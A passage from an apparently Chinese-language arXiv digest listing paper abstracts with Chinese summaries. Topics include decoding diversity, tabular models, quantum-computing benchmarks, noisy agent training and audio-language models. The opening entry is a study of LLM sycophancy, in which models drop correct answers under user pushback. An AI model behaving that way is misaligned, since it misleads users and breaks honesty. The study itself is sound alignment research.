发表机构 * Vanderbilt University(范德比尔特大学) Vanderbilt University Medical Center(范德比尔特大学医学中心) Intuit AI Research(Intuit AI研究院)

AI总结 本文提出MUSE框架,通过区分谄媚从众和不确定性驱动的从众,揭示LLM在用户反驳时改变立场的行为机制,并发现两种从众均随用户感知专业性和建议合理性增强。

详情
AI中文摘要

大型语言模型(LLMs)已知会放弃初始立场以适应用户的反驳。虽然先前研究主要将此行为归因于从人类反馈强化学习中习得的谄媚,但我们假设从众行为也受模型在推理时的认知不确定性驱动。本文提出MUSE,一个两阶段评估框架,用于解开驱动LLM从众行为的机制。具体而言,MUSE将模型回答查询时的认知不确定性与其在后续轮次中屈服于用户反驳的可能性进行映射。我们证明驱动从众的机制不仅限于谄媚。具体来说,我们刻画了共同驱动从众的两个不同因素:谄媚从众,即模型即使对其初始回答绝对确定也会与用户反驳保持一致;以及不确定性驱动从众,即模型从众可能性随其不确定性增加而增加。此外,我们进行消融研究,证明谄媚从众和不确定性驱动从众均随1)LLM对用户感知专业性的增加和2)用户建议的合理性增加而增长。更广泛地说,MUSE通过区分对齐诱导的谄媚和训练语料驱动的不确定性,为更有针对性的干预策略提供信息。

英文摘要

Large language models (LLMs) are known to abandon their initial stance to conform to user pushback. While prior research largely attributes this behavior to sycophancy learned during reinforcement learning from human feedback, we hypothesize that conformity is also driven by a model's epistemic uncertainty at inference time. In this paper, we introduce MUSE, a two-stage evaluation framework to disentangle the mechanisms driving LLM conformity. Specifically, MUSE maps a model's epistemic uncertainty in responding to a query against its likelihood to yield to user pushback in a subsequent turn. We demonstrate that the mechanisms driving conformity extend beyond sycophancy alone. Specifically, we characterize two distinct factors that jointly drive conformity: sycophantic conformity, where a model aligns with user pushback even with absolute certainty in its initial response, and uncertainty-driven conformity, where a model's likelihood for conformity increases alongside its uncertainty. Furthermore, we conduct ablation studies to demonstrate that both sycophantic conformity and uncertainty-driven conformity grow with 1) the LLM's perceived expertise of the user and 2) the plausibility of the user's suggestions. More broadly, MUSE informs more targeted intervention strategies by distinguishing alignment-induced sycophancy and training-corpora-driven uncertainty.

2605.27268 2026-05-27 cs.CL cs.AI 版本更新

Lost in Sampling: Assessing Lexical Reachability in LLMs via the Word Coverage Score (WCS)

迷失在采样中:通过词覆盖率评估大语言模型中的词汇可达性

Samer Awad, Javier Conde, Carlos Arriaga, Tairan Fu, Javier Coronado-Blázquez, Pedro Reviriego

发表机构 * Information and Processing Telecommunications Center(信息与处理电信中心) Universidad Politécnica de Madrid(马德里理工大学) Politecnico di Milano(米兰理工大学) Banco de España(西班牙银行)

AI总结 提出词覆盖率(WCS)指标,量化标准采样过滤器(如Top-p、Top-k、Min-p)如何抑制低频率高信息词汇的生存率,揭示解码机制对语言多样性的影响。

Comments 15 pages, 6 figures

详情
AI中文摘要

现代大语言模型(LLM)常因生成重复和同质化文本而受到批评,尽管它们拥有庞大的潜在词汇量。以往研究关注模型知识和训练数据,我们则探究解码机制在抑制语言多样性中的作用。我们引入词覆盖率(WCS),该指标量化了标准采样过滤器(如Top-$p$、Top-$k$和Min-$p$)在数学上剔除上下文适当的人类词汇的程度。WCS并非评估静态知识,而是衡量低频率、高信息人类词汇的词汇存活率作为采样参数的函数。通过审计人类撰写的语料片段中的开放权重模型,我们识别出哪些合理的词汇选择因解码器而变得不可达,即使它们存在于概率空间中。我们的结果提供了定量证据,表明行业标准的采样默认值充当了无意的审查机制,将人类表达的独特纹理平滑为同质化的话语。WCS为优化文本连贯性与词汇丰富性之间的权衡提供了严谨框架,为在生成模型中保留人类语言多样性提供了诊断工具。

英文摘要

Modern Large Language Models (LLMs) are often criticized for producing repetitive and homogeneous text, despite possessing vast latent vocabularies. While previous research has focused on model knowledge and training data, we investigate the role of decoding mechanics in suppressing linguistic diversity. We introduce the Word Coverage Score (WCS), a metric that quantifies the extent to which contextually appropriate human vocabulary is mathematically pruned by standard sampling filters (e.g., Top-$p$, Top-$k$, and Min-$p$). Rather than assessing static knowledge, the WCS measures the lexical survival rate of low-frequency, high-information human words as a function of sampling parameters. By auditing open-weight models on human-authored corpus fragments, we identify which logical lexical choices are rendered unreachable by the decoder, even when they reside within the probability space. Our results provide quantitative evidence that industry-standard sampling defaults act as unintended censorship mechanisms, smoothing the unique textures of human expression into a homogenized discourse. The WCS offers a rigorous framework for optimizing the trade-off between text coherence and lexical richness, providing a diagnostic tool for preserving the diversity of human language in generative models.

2605.27254 2026-05-27 cs.LG cs.AI 版本更新

LUCoS: Latent Unsupervised Context Selection for Tabular Foundation Models

LUCoS: 表格基础模型的潜在无监督上下文选择

Oroel Ipas, Guillermo Gomez-Trenado, Rocío Romero-Zaliz, Isaac Triguero

发表机构 * Andalusian Research Institute in Data Science and Computational Intelligence (DaSCI)(安达卢西亚数据科学与计算智能研究 institute) Department of Computer Science and Artificial Intelligence (DECSAI)(计算机科学与人工智能系) Research Center in Information and Communication Technologies (CITIC)(信息与通信技术研究中心) Instituto de Investigación Biosanitaria Ibs.GRANADA, University of Granada, Granada, 18071, Spain(格拉纳达大学生物医学研究所)

AI总结 针对表格基础模型在低标签场景下的上下文选择问题,提出LUCoS方法,利用无监督先验拟合网络(PFN)的潜在几何结构选择代表性medoids作为上下文,在67个数据集上优于随机选择和原始空间方法。

Comments Comments: 18 pages, 4 figures, supplementary appendices included

详情
AI中文摘要

选择哪些实例进行标注是低标签表格学习中的一个关键挑战。对于最近的表格基础模型(如TabPFN),上下文选择直接决定预测性能。有监督的oracle实验表明,在相同标注预算下,精心选择的标注上下文集可以显著优于随机选择。然而,在TFM文献中,冷启动设置(即必须在任何标签可用之前选择实例)很少受到关注。这个问题本质上是几何问题。在视觉和语言领域,基础模型诱导出嵌入空间,其中简单的几何选择方法是有效的。相比之下,表格实例选择迄今为止主要是在原始表格空间中进行,而该空间缺乏自然的度量;异构类型、混合尺度以及非线性交互使得原始空间距离对于上下文构建不可靠,并且随着预算增加,原始空间选择在大多数数据集上表现低于随机。我们提出LUCoS(潜在无监督上下文选择),该方法用无监督先验拟合网络(PFN)诱导的潜在几何替换原始特征几何,并选择代表性medoids作为上下文。在67个OpenML-CC18数据集上,跨六个低标签预算评估,LUCoS在平均AUC、ACC和F1上排名第一,结论在指标和数据集级别的稳健性检查中保持稳定。增益分解揭示了一个简单机制:在最小预算下,主要收益来自强制覆盖;随着预算增加,决定性因素变为衡量覆盖的表示空间。LUCoS缓解了原始特征空间选择的失败,表明可靠的无监督上下文选择更少依赖于选择器的复杂性,而更多依赖于在有意义的表示几何中定义代表性。

英文摘要

Selecting which instances to label is a key challenge in low-label tabular learning. For recent Tabular Foundation Models such as TabPFN, context selection directly determines predictive performance. Supervised oracle experiments show that carefully chosen labeled context sets can strongly outperform random selection under the same labeling budget. However, the cold-start setting, where instances must be selected before any labels are available, has received little attention in the TFM literature. This problem is fundamentally geometric. In vision and language, foundation models induce embedding spaces where simple geometric selection methods are effective. In contrast, tabular instance selection has so far been performed predominantly in the original tabular space, which lacks a natural metric; heterogeneous types, mixed scales, and nonlinear interactions make raw-space distances unreliable for context construction, and original-space selection falls below random on the majority of datasets as the budget grows. We propose LUCoS (Latent Unsupervised Context Selection), which replaces raw-feature geometry with the latent geometry induced by embeddings from an unsupervised Prior-Fitted Network (PFN) and selects representative medoids as context. Evaluated on 67 OpenML-CC18 datasets across six low-label budgets, LUCoS ranks first under mean AUC, ACC, and F1, with conclusions stable across metrics and dataset-level robustness checks. A gain decomposition reveals a simple mechanism: at the smallest budgets, the main benefit comes from enforcing coverage; as the budget increases, the decisive factor becomes the representation space in which coverage is measured. LUCoS mitigates failures of original feature space selection, showing that reliable unsupervised context selection depends less on selector sophistication than on defining representativeness in a meaningful representation geometry.

2605.27249 2026-05-27 cs.AI cs.CL 版本更新

Gumbel Machine: Counterfactual Student Writing Generation via Gumbel Noise Steering

Gumbel机器:通过Gumbel噪声引导生成反事实学生写作

Hunter McNichols, Alexander Scarlatos, Mihai Dascalu, Danielle McNamara, Andrew Lan

发表机构 * University of Massachusetts Amherst(马萨诸塞大学阿默斯特分校) University Politehnica of Bucharest(布加勒斯特理工大学) Arizona State University(亚利桑那州立大学)

AI总结 提出Gumbel机器,一种利用β-Hindsight控制解码算法生成既符合评分标准又与学生原文相似的反事实文本的模块化方法。

Comments preprint

详情
AI中文摘要

跨学科教学的有效方法是提供高质量工作的示例。然而,示例可能与学生的当前工作存在显著差异,使得学生难以模仿。理想的学习示范是学生工作的反事实版本,即与学生自身工作相似但有所改进的版本。现有的使用大型语言模型(LLMs)进行反事实文本生成的自动化方法导致了难以转化为实际应用的领域特定系统。我们提出了Gumbel机器,一种灵活、模块化的反事实生成方法,它利用LLM的指令遵循能力,同时鼓励与参考事实文本的相似性。我们方法的核心是一种新颖的受控解码算法β-Hindsight控制,该算法在反事实生成过程中利用潜在随机性作为可调的相似性控制机制。在根据各种标准评分的学生写作数据集上的实验表明,我们的方法在生成既符合评分标准又与参考文本相似的反事实文本方面是有效的。

英文摘要

An effective method of teaching across disciplines is to provide examples of high-quality work. However, an example may be significantly different from a student's current work, making it challenging for them to emulate. An ideal learning demonstration is a counterfactual version of the student work, an improved version that is still similar to their own. Existing automated approaches for counterfactual text generation using Large Language Models (LLMs) result in domain-specific systems that are difficult to translate into practical applications. We present the Gumbel Machine, a flexible, modular approach to generating counterfactuals that leverages LLM instruction-following capabilities while encouraging similarity to a reference factual text. Central to our approach is a novel, controlled decoding algorithm, $β$-Hindsight control, which uses latent randomness as a tunable similarity control mechanism during counterfactual generation. Experiments on datasets of student writing, scored on various criteria, demonstrate the effectiveness of our approach at generating counterfactuals both rubric-consistent and similar to a reference.

2605.27246 2026-05-27 cs.LO cs.AI math.LO 版本更新

Many Logics, One Methodology: A Plea for Logical Pluralism in Formalised Reasoning (preprint)

多种逻辑,一种方法论:在形式化推理中倡导逻辑多元主义(预印本)

Christoph Benzmüller, Daniel Kirchner, Luca Pasetto

发表机构 * University of Luxembourg(卢森堡大学)

AI总结 本文基于LogiKEy逻辑多元知识表示与推理方法论,主张在统一元逻辑框架内支持对象逻辑层面的逻辑多元主义,并警告逻辑帝国主义对跨学科复用的阻碍。

Comments 21 pages, 6 figures; to appear (preprint)

详情
AI中文摘要

这份立场声明回顾了二十年来在经典高阶逻辑(HOL)中浅嵌入非经典逻辑的工作,该研究扩展为HOL中的一系列逻辑嵌入,并启发了LogiKEy逻辑多元知识表示与推理方法论。本文在LogiKEy等统一元逻辑框架内,以计算形而上学为基础,论证了对象逻辑层面的逻辑多元主义。更广泛地说,它倡导现代证明助手对逻辑多元主义的原则性支持,并警告逻辑帝国主义——即在大规模理论发展中僵化采用单一基础逻辑——这阻碍了LogiKEy旨在实现的跨学科复用。

英文摘要

This position statement looks back on two decades of work on shallow embeddings of non-classical logics in classical higher-order logic (HOL), a line of research that expanded into a range of logic embeddings in HOL and inspired the LogiKEy logic-pluralistic knowledge representation and reasoning methodology. This paper advances the case for logical pluralism at object-logic level within a unifying meta-logical framework such as LogiKEy, grounding the argument in computational metaphysics. More broadly, it advocates principled support for logical pluralism in modern proof assistants, and cautions against logical imperialism -- the rigid adoption of a single foundational logic for large-scale theory developments -- which impedes the interdisciplinary reuse that LogiKEy is designed to enable.

2605.27210 2026-05-27 quant-ph cs.AI 版本更新

Qiskit QuantumKatas: Adapting Microsoft's Quantum Computing exercises for LLM evaluation

Qiskit QuantumKatas: 为LLM评估改编微软的量子计算练习

Juan Cruz-Benito, Ismael Faro

发表机构 * IBM Research(IBM研究院)

AI总结 本文将微软的QuantumKatas量子计算课程从Q#移植到Qiskit,并构建评估框架,用于系统评估大型语言模型在量子计算任务上的能力。

详情
AI中文摘要

我们将微软的QuantumKatas——一个成熟的量子计算课程——从Q#改编到最广泛采用的量子计算框架Qiskit,并打包一个用于系统LLM评估的评估框架。由此产生的基准测试包含26个类别中的350个任务,涵盖从基本门到高级算法(Grover、Simon、Deutsch-Jozsa)、纠错、密钥分发和量子游戏。每个任务包括自然语言提示、规范解和通过经典电路模拟的确定性测试验证。通过基于QuantumKatas经过验证的教学设计而不是从头创建任务,我们继承了有原则的难度递进和全面的概念覆盖,同时贡献了框架改编、评估基础设施和实证分析。我们评估了7种提示配置下的16个LLM——总共39,200次模型运行——以证明基准测试的实用性。三个关键发现出现:(1)基准测试有效区分模型能力,最佳配置通过率从32.3%到83.1%不等,前沿模型与开源模型之间平均差距为26.1个百分点;(2)模型在实现已知算法方面表现良好(SimonsAlgorithm 82.1%,BasicGates 81.6%),但在问题编码方面表现不佳(SolveSATWithGrover 34.4%,DistinguishUnitaries 40.0%);(3)思维链提示显示出适度双峰效应——它是三个模型的最佳策略(其中两个根据供应商文档明确进行了推理调优),但降低了其余模型的性能,使其总体上处于中游(平均56.3%),落后于少样本-5(57.8%)。我们发布基准测试、评估框架和基线结果,以支持量子计算中LLM能力的研究。

英文摘要

We adapt Microsoft's QuantumKatas -- a well-established quantum computing curriculum -- from Q# to Qiskit, the most widely-adopted quantum computing framework, and package it with an evaluation framework for systematic LLM assessment. The resulting benchmark comprises 350 tasks across 26 categories, spanning fundamental gates through advanced algorithms (Grover's, Simon's, Deutsch-Jozsa), error correction, key distribution, and quantum games. Each task includes a natural language prompt, canonical solution, and deterministic test verification via classical circuit simulation. By building on the QuantumKatas' proven pedagogical design rather than creating tasks from scratch, we inherit a principled difficulty progression and comprehensive concept coverage while contributing the framework adaptation, evaluation infrastructure, and empirical analysis. We evaluate 16 LLMs across 7 prompting configurations -- a total of 39,200 model runs -- to demonstrate the benchmark's utility. Three key findings emerge: (1) the benchmark effectively differentiates model capabilities, with best-configuration pass rates ranging from 32.3% to 83.1% and a 26.1 pp average gap between frontier and open-source models; (2) models perform well at implementing known algorithms (SimonsAlgorithm 82.1%, BasicGates 81.6%) but struggle with problem encoding (SolveSATWithGrover 34.4%, DistinguishUnitaries 40.0%); and (3) chain-of-thought prompting shows a modestly bimodal effect -- it is the best strategy for three models (two of them explicitly reasoning-tuned per vendor documentation) but degrades performance for the rest, leaving it mid-pack in aggregate (56.3% mean) behind few-shot-5 (57.8%). We release the benchmark, evaluation framework, and baseline results to support research on LLM capabilities in quantum computing.

2605.27209 2026-05-27 cs.AI 版本更新

Learning to Act under Noise: Enhancing Agent Robustness via Noisy Environments

在噪声中学习行动:通过噪声环境增强智能体鲁棒性

Yuxin Chen, Xiaodong Cai, Junfeng Fang, Zhuowen Han, Yu Wang, Yaorui Shi, Yi Zhang, Qi Gu, Xunliang Cai, Xiang Wang, An Zhang, Tat-Seng Chua

发表机构 * National University of Singapore(国立新加坡大学) Meituan(美团) Tsinghua University(清华大学) Tianjin University(天津大学) University of Science and Technology of China(中国科学技术大学)

AI总结 提出NoisyAgent框架,通过在训练中引入用户噪声和工具噪声,提升智能体在真实世界噪声环境下的鲁棒性和泛化能力。

详情
AI中文摘要

大型语言模型(LLMs)的最新进展促进了LLMs作为能够推理、规划和工具使用的交互式智能体的广泛部署。尽管在现有基准测试中表现强劲,但此类智能体在部署到现实世界环境时往往表现出显著退化,因为现实环境本质上是随机且不完美的。我们认为,这种差异源于理想化训练设置与现实交互动态之间的根本性不匹配,当前范式依赖于精心策划的任务指令和稳定、可控的环境。为了解决这一差距,我们提出了NoisyAgent,一个明确将环境不完美性纳入智能体学习过程的智能体训练框架。我们识别出现实场景中交互噪声的两个主要来源:用户噪声,捕捉用户交互中的模糊性和变异性;以及工具噪声,反映工具执行中的失败和异常。我们通过修改用户交互模式和模拟训练环境中的工具执行结果,将此类扰动引入训练流程。为了稳定训练同时鼓励智能体处理日益具有挑战性的不完美性,噪声仅应用于部分轨迹,并随着模型适应当前噪声水平而逐步增加难度。大量实验表明,我们的方法在噪声和动态环境下持续提升智能体鲁棒性。我们的分析揭示,在噪声条件下训练也在理想化基准测试中带来了性能提升,这表明对环境噪声的受控暴露促进了更可泛化的推理和决策行为。我们的发现强调了建模交互不完美性对于弥合智能体训练与现实部署之间差距的重要性。

英文摘要

Recent advances in large language models (LLMs) have facilitated the widespread deployment of LLMs as interactive agents capable of reasoning, planning, and tool use. Despite strong performance on existing benchmarks, such agents often exhibit notable degradation when deployed in real-world settings, where environments are inherently stochastic and imperfect. We argue that this discrepancy arises from a fundamental mismatch between idealized training settings and real-world interaction dynamics, where current paradigms rely on carefully curated task instructions and stable, well-controlled environments. To address this gap, we propose NoisyAgent, an agentic training framework that explicitly incorporates environmental imperfections into the agent learning process. We identify two major sources of interaction noise in real-world scenarios: user noise, which captures ambiguity and variability in user interaction, and tool noise, which reflects failures and anomalies in tool execution. We introduce such perturbations into the training pipeline by modifying user interaction patterns and simulating tool execution results within the training environment. To stabilize training while encouraging agents to handle increasingly challenging imperfections, noise is applied to only a subset of rollouts and progressively increased in difficulty as the model adapts to the current noise level. Extensive experiments demonstrate that our approach consistently improves agent robustness under noisy and dynamic environments. Our analysis reveals that training under noise conditions also yields performance gains on idealized benchmarks, suggesting that controlled exposure to environmental noise promotes more generalizable reasoning and decision-making behaviors. Our findings highlight the importance of modeling interaction imperfections for bridging the gap between agent training and real-world deployment.

2605.27205 2026-05-27 eess.IV cs.AI 版本更新

TWIST: Closed-Loop token Synchronization for Application-Aware Wireless Digital Twins

TWIST:面向应用感知无线数字孪生的闭环令牌同步

Sige Liu, Kezhi Wang

发表机构 * Department of Computer Science, Brunel University London(布伦尔大学伦敦计算机科学系)

AI总结 提出TWIST框架,通过闭环令牌同步和模式条件不等错误保护,在有限通信资源下实现应用感知的无线数字孪生状态同步,提升交通状态推断性能并降低同步成本。

详情
AI中文摘要

无线数字孪生需要在有限且时变的通信资源下,对随时间演变的物理场景及其数字副本进行重复同步。对于以感知为中心的数字孪生,像素域传输或均匀保护的比特流可能与孪生侧应用消耗的语义状态不匹配。本文提出TWIST,一种面向应用感知无线数字孪生的闭环令牌同步框架。TWIST将每个物理观测表示为一个令牌,并通过无线链路同步该状态,而非优化视觉重建。令牌位置按任务相关性分组,并通过低、中、高同步模式下的模式条件不等错误保护进行保护。在孪生侧,解码置信度将不可靠的硬令牌决策转换为擦除,在更新语义孪生状态之前由补全模型恢复。恢复后的状态支持交通状态推断,并生成紧凑的反馈统计信息,包括信道质量、接收器不确定性、语义漂移和应用优先级,用于后续模式自适应。在动态道路场景数字孪生场景上的实验表明,与固定模式和仅信道自适应策略相比,TWIST改善了交通状态推断和语义孪生状态同步,同时相对于始终高传输降低了平均同步成本。

英文摘要

Wireless digital twins require repeated synchronization between a time-evolving physical scene and its digital counterpart under limited and time-varying communication resources. For perception-centric twins, pixel-domain transmission or uniformly protected bitstreams can be mismatched to the semantic state consumed by twin-side applications. This paper proposes TWIST, a closed-loop token synchronization framework for application-aware wireless digital twins. TWIST represents each physical observation as a token and synchronizes this state over a wireless link, rather than optimizing visual reconstruction. Token positions are grouped by task relevance and protected through mode-conditioned unequal error protection under low-, medium-, and high-synchronization modes. At the twin side, decoding confidence converts unreliable hard token decisions into erasures, which are restored by a completion model before updating the semantic twin state. The recovered state supports traffic-state inference and generates compact feedback statistics, including channel quality, receiver uncertainty, semantic drift, and application priority, for subsequent mode adaptation. Experiments on a dynamic road-scene digital-twin scenario show that TWIST improves traffic-state inference and semantic twin-state synchronization compared with fixed-mode and channel-only adaptation strategies, while reducing the average synchronization cost relative to always-high transmission.

2605.27203 2026-05-27 cs.CV cs.AI 版本更新

Generative Animations: A Multi-Model Pipeline for Prompt-Driven Motion Synthesis

生成式动画:面向提示驱动运动合成的多模型流水线

Mannat Khurana, Sanyam Jain, Rishav Agarwal

发表机构 * Canva Adobe

AI总结 提出一种结合大语言模型和分割模型的流水线,将自然语言提示自动转换为符合场景几何、深度遮挡和3D透视变换的动画运动路径。

Comments 5 pages, 6 figures

详情
AI中文摘要

动画将数字文档提升为沉浸式体验,然而创建自定义运动路径仍然繁琐,需要设计师手动选择预设、绘制贝塞尔点并配置时间属性。我们引入了生成式动画,这是一个将自然语言提示转换为生产就绪动画的系统。通过将用于语义解析的大语言模型(LLMs)与用于视觉基础的Segment Anything Model(SAM)串联,我们的流水线自动生成尊重场景几何、处理基于深度的遮挡并考虑3D透视变换的运动路径。我们通过三个用例演示该系统:轮廓跟随轨迹、具有z轴顺序意识的轨道动画以及变换对象上的透视对齐运动。

英文摘要

Animation elevates digital documents into immersive experiences, yet creating custom motion paths remains cumbersome, requiring designers to manually select presets, plot Bézier points, and configure timing properties. We introduce Generative Animations, a system that transforms natural language prompts into production-ready animations. By chaining Large Language Models (LLMs) for semantic parsing with the Segment Anything Model (SAM) for visual grounding, our pipeline automatically generates motion paths that respect scene geometry, handle depth-based occlusions, and honor 3D perspective transforms. We demonstrate the system through three use cases: contour-following trajectories, orbital animations with z-order awareness, and perspective-aligned motion on transformed objects.

2605.27190 2026-05-27 cs.CL cs.AI cs.LG cs.SD 版本更新

Learning When to Think While Listening in Large Audio-Language Models

在大音频语言模型中学习何时在聆听时思考

Zhiyuan Song, Weici Zhao, Yang Xiao, Suhao Yu, Cheng Zhu, Jiatao Gu

发表机构 * University of Pennsylvania(宾夕法尼亚大学)

AI总结 提出一种可学习的等待-思考-回答控制机制,通过多奖励强化学习优化大音频语言模型在流式语音交互中的推理时机,在提升准确率的同时减少响应延迟。

Comments 19 pages, 4 figures, 6 tables

详情
AI中文摘要

近期大音频语言模型(LALMs)的进展使得实时、流式的语音交互越来越实用。在这种场景下,推理质量和响应速度紧密耦合:将推理延迟到语音端点可以提高答案质量,但会将思考时间转移到用户可见的响应延迟中,而过早回答则可能在决定性证据到达之前做出承诺。我们为LALMs引入了一种可学习的等待-思考-回答控制公式。受人类对话渐进性启发,控制器在部分音频证据下决定何时等待、何时外化紧凑的推理更新、以及何时回答。以Qwen2.5-Omni-7B为基础模型,我们从语音推理数据中构建对齐的等待-思考-回答轨迹,使用监督微调(SFT)训练控制器,然后应用解耦裁剪和动态采样策略优化(DAPO)。奖励结合了答案正确性、动作有效性、更新时机、延迟同步、推理质量和链一致性,优化完整的等待-思考-回答轨迹,而不仅仅是最终答案。在一个六任务合成语音推理问答(SRQA)基准上,六奖励DAPO控制器将行加权准确率从67.6%提升到70.3%,同时在相同Qwen部署环境下将端点后最终思考长度减少14%。在一个包含186个人类录音的真实音频基准(Real Audio Bench)上,作为超越文本转语音(TTS)渲染语音的迁移检查,控制器家族仍然有效:SFT实现了最强的准确率,而六奖励DAPO控制器是唯一最终思考长度低于基础模型的学习变体。这些结果表明,流式模型应该学习在音频流中何时使中间推理显式化。

英文摘要

Recent advances in Large Audio-Language Models (LALMs) have made real-time, streaming spoken interaction increasingly practical. In this setting, reasoning quality and responsiveness are tightly coupled: delaying reasoning until the speech endpoint can improve answer quality but moves deliberation into user-visible response delay, while answering too early risks committing before decisive evidence arrives. We introduce a learnable wait-think-answer control formulation for LALMs. Motivated by the incremental nature of human conversation, the controller decides under partial audio evidence when to wait, when to externalize a compact reasoning update, and when to answer. Using Qwen2.5-Omni-7B as the base model, we construct aligned wait-think-answer traces from spoken reasoning data, train the controller with supervised fine-tuning (SFT), and then apply Decoupled Clip and Dynamic Sampling Policy Optimization (DAPO). The reward combines answer correctness, action validity, update timing, latency synchronization, reasoning quality, and chain consistency, optimizing the complete wait-think-answer trajectory and not the final answer alone. On a six-task synthetic spoken reasoning question answering (SRQA) benchmark, the six-reward DAPO controller improves the row-weighted accuracy from 67.6% to 70.3% while reducing post-endpoint final-think length by 14% under the same Qwen deployment harness. On a 186-item human-recorded Real Audio Bench, a transfer check beyond text-to-speech (TTS)-rendered speech, the controller family remains functional: SFT achieves the strongest accuracy, while the six-reward DAPO controller is the only learned variant whose final-think length falls below the base. These results suggest that a streaming model should learn when to make intermediate reasoning explicit during the audio stream.

2605.27178 2026-05-27 cs.CV cs.AI cs.LG cs.RO 版本更新

FoundObj: Self-supervised Foundation Models as Rewards for Label-free 3D Object Segmentation

FoundObj: 自监督基础模型作为无标签3D物体分割的奖励

Zihui Zhang, Zhixuan Sun, Yafei Yang, Jinxi Li, Jiahao Chen, Bo Yang

发表机构 * Shenzhen Research Institute, The Hong Kong Polytechnic University(深圳研究院,香港理工大学) vLAR Group, The Hong Kong Polytechnic University(vLAR小组,香港理工大学)

AI总结 提出FoundObj框架,利用自监督2D/3D基础模型的语义和几何先验作为奖励,通过强化学习引导超点合并,实现无标注复杂场景3D物体分割。

Comments ICML 2026. Zihui and Zhixuan are co-first authors. Code and data are available at: https://github.com/vLAR-group/FoundObj

详情
AI中文摘要

我们解决了在训练过程中不依赖任何场景级人类标注的复杂场景点云中3D物体分割的挑战性任务。现有方法通常局限于识别简单物体,这主要是由于学习过程中物体先验不足。在本文中,我们提出了FoundObj,一个新颖的框架,其特点是基于超点的物体发现代理,该代理在我们的创新语义和几何奖励模块的指导下逐步合并合适的相邻超点。这些模块协同利用自监督2D/3D基础模型中的语义和几何先验,为物体发现代理提供互补反馈,并通过强化学习实现对多类物体的鲁棒识别。在多个基准上的大量实验表明,我们的方法始终优于现有基线。值得注意的是,我们的方法在零样本和长尾场景中表现出强大的泛化能力,突显了其在可扩展、无标签3D物体分割方面的潜力。

英文摘要

We address the challenging task of 3D object segmentation in complex scene point clouds without relying on any scene-level human annotations during training. Existing methods are typically constrained to identifying simple objects, primarily due to insufficient object priors in the learning process. In this paper, we present FoundObj, a novel framework featuring a superpoint-based object discovery agent that incrementally merges suitable neighboring superpoints, guided by our innovative semantic and geometric reward modules. These modules synergistically leverage semantic and geometric priors from self-supervised 2D/3D foundation models, providing complementary feedback to the object discovery agent and enabling robust identification of multi-class objects through reinforcement learning. Extensive experiments on diverse benchmarks demonstrate that our approach consistently outperforms existing baselines. Notably, our method exhibits strong generalization in zero-shot and long-tail scenarios, underscoring its potential for scalable, label-free 3D object segmentation.

2605.27174 2026-05-27 cs.SD cs.AI cs.CY 版本更新

An investigation of AI integration in sound designer workflows and experiences

AI在声音设计师工作流程与体验中的整合研究

Nelly Garcia, Joshua Reiss

发表机构 * Queen Mary University of London(伦敦大学玛丽女王学院)

AI总结 通过混合方法研究(76人调查+20人访谈),发现当前AI工具在快速消费媒体中表现良好,但缺乏高端声音设计所需的叙事复杂性,从业者偏好辅助性、任务特定的应用,而非端到端生成系统。

详情
AI中文摘要

人工智能正越来越多地被整合到专业音频制作工作流程中,然而开发者生产的工具与实际声音设计师的需求之间仍存在差距。本文通过一项混合方法研究调查了这一差距,包括对76名从业者的调查以及对20名行业专业人士的后续半结构化访谈。使用描述性统计分析和主题分析对结果进行分析,以识别两个数据集中的模式。我们的分析得出了五个主题:上下文、工作流程、潜力、风险和正确使用。我们的工作表明,当前的AI工具在快速消费媒体环境中表现良好,但缺乏高端声音设计(电影、沉浸式体验等)所需的叙事复杂性。从业者表现出对辅助性、任务特定应用的偏好,特别是在音频修复和库管理方面,而不是端到端生成系统。这项工作为创意产业中AI及AI增强工具的使用正在进行的讨论做出了贡献。我们从声音设计师和创意音频从业者的角度报告了该领域的当前状况,并根据我们的发现为声音技术专家和开发者提供了一系列建议,以指导开发更明智的AI声音设计工具。

英文摘要

Artificial intelligence is increasingly being integrated into professional audio production workflows, yet a gap persists between the tools developers produce and the requirements of practising sound designers. This paper investigates this gap through a mixed-methods study comprising a survey of 76 practitioners and follow-up semi-structured interviews with 20 industry professionals. Results were analysed using descriptive statistical analysis and thematic analysis to identify patterns across both datasets. Five themes emerged from our analysis: Context, Workflow, Potential, Risks, and Right Use. Our work indicates that current AI tools perform adequately in fast-consumption media contexts but lack the narrative sophistication required for high-end sound design (films, immersive experiences etc). Practitioners demonstrate a preference for assistive, task-specific applications, particularly in audio restoration and library management, over end-to-end generative systems. This work contributes to the on-going discussion on the use of AI and AI-enhanced tools in the creative industries. We report on the current status of the field from the point of view of sound designers and creative audio practitioners, and offer a set of recommendation for sound technologist and developers based on our findings to guide the development of more informed AI tools for sound design.

2605.27168 2026-05-27 cs.CL cs.AI cs.CY 版本更新

Grounding Text Embeddings in Stakeholder Associations

将文本嵌入与利益相关者关联对齐

Jonathan Rystrøm, Sofie Burgos-Thorsen, Zihao Fu, Johan Irving Søltoft, Kenneth C. Enevoldsen, Chris Russell

发表机构 * University of Oxford(牛津大学) Institute for Wicked Problems(复杂问题研究所) The Chinese University of Hong Kong(香港中文大学) Danish Technical University(丹麦技术大学) Aarhus University(奥胡斯大学)

AI总结 提出利益相关者对齐练习方法,通过评估嵌入模型与人类专家的语义距离一致性,发现神经文本嵌入在丹麦政策案例中可靠性显著低于专家(差距19-26个百分点),且该差距在美国联邦AI用例中复现(16个百分点)。

详情
AI中文摘要

文本嵌入被广泛用于分析大型复杂文本语料库。然而,尚不清楚这些嵌入是否捕捉到与使用它们的人类专家相同的语义距离。确保嵌入表示与人类意图一致对于有效分析至关重要。我们提出了利益相关者对齐练习,这是一种使专家关联显式化并将嵌入模型结果扎根于人类理解的方法。在我们关于丹麦政策问题的主要案例研究中,我们发现神经文本嵌入的可靠性远低于人类专家(差距19-26个百分点),并且这种不对齐会传播到下游聚类性能(练习排名与聚类质量之间的Spearman $ρ=0.9$)。一项关于美国联邦AI用例的二次研究使用数字协议和不同的专家社区在英语中复现了该差距(16个百分点)——表明该差距并非单一工具或领域的产物。利益相关者对齐练习提供了一种实用方法,用于评估嵌入模型是否捕捉到对领域专家最重要的语义区分。

英文摘要

Text embeddings are widely used to analyse large corpora of complex texts. However, it is unclear whether the embeddings capture the same semantic distances as the human experts using them. Ensuring alignment between embedding representations and human intentions is essential for valid analyses. We present the Stakeholder Grounding Exercise, a method for making expert associations explicit and grounding embedding model results in human understanding. In our primary case study on Danish policy issues, we find that neural text embeddings are substantially less reliable than human experts (19-26 pp gap), and that this misalignment propagates to downstream clustering performance (Spearman $ρ=0.9$ between exercise ranking and cluster quality). A secondary study on US Federal AI use cases replicates the gap (16pp) in English, using a digital protocol and a different community of experts -- demonstrating that the gap is not an artefact of a 